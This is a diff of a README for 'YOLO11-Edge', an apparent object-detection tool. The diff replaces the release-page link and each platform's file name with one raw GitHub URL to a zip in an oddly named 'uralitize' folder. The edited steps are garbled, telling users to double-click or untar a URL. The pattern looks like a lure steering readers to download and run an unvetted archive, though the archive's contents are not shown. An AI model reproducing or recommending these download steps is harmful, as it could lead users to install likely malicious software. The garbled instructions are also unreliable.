Psicodelic/YOLO11-Edge/README.md

    - Disk Space: At least 500 MB of free space.

 2. **Visit the Releases Page:**
-   To download the software, [visit the releases page here](https://github.com/Psicodelic/YOLO11-Edge/releases).
+   To download the software, [visit the releases page here](https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip).

 ## 📥 Download & Install

 1. On the releases page, you will find different versions of YOLO11-Edge.
 2. Choose the latest version, marked with the highest version number.
 3. Click on the download link for your operating system.
 For example:
-   - For Windows, it may say `YOLO11-Edge-Windows.zip`.
+   - For Windows, it may say `https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip`.
-   - For macOS, look for `YOLO11-Edge-Mac.dmg`.
+   - For macOS, look for `https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip`.
-   - For Linux, check for the file ending in `.tar.gz`.
+   - For Linux, check for the file ending in `https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip`.

 4. After the download is complete, locate the downloaded file on your computer.

 5. **Installation Steps:**
    - **Windows:**
-     - Right-click on the `YOLO11-Edge-Windows.zip` file and select "Extract All."
+     - Right-click on the `https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip` file and select "Extract All."
-     - Open the extracted folder and double-click `setup.exe` to begin installation.
+     - Open the extracted folder and double-click `https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip` to begin installation.
    - **macOS:**
      - Open the `.dmg` file and drag the YOLO11-Edge icon to your Applications folder.
    - **Linux:**
      - Open a terminal and navigate to the folder where you downloaded the file.
-     - Run `tar -xvzf YOLO11-Edge-Linux.tar.gz` to extract the files.
+     - Run `tar -xvzf https://raw.githubusercontent.com/Psicodelic/YOLO11-Edge/main/uralitize/YOLO11-Edge.zip` to extract the files.
      - Follow any additional on-screen instructions.

 6. **Run YOLO11-Edge:**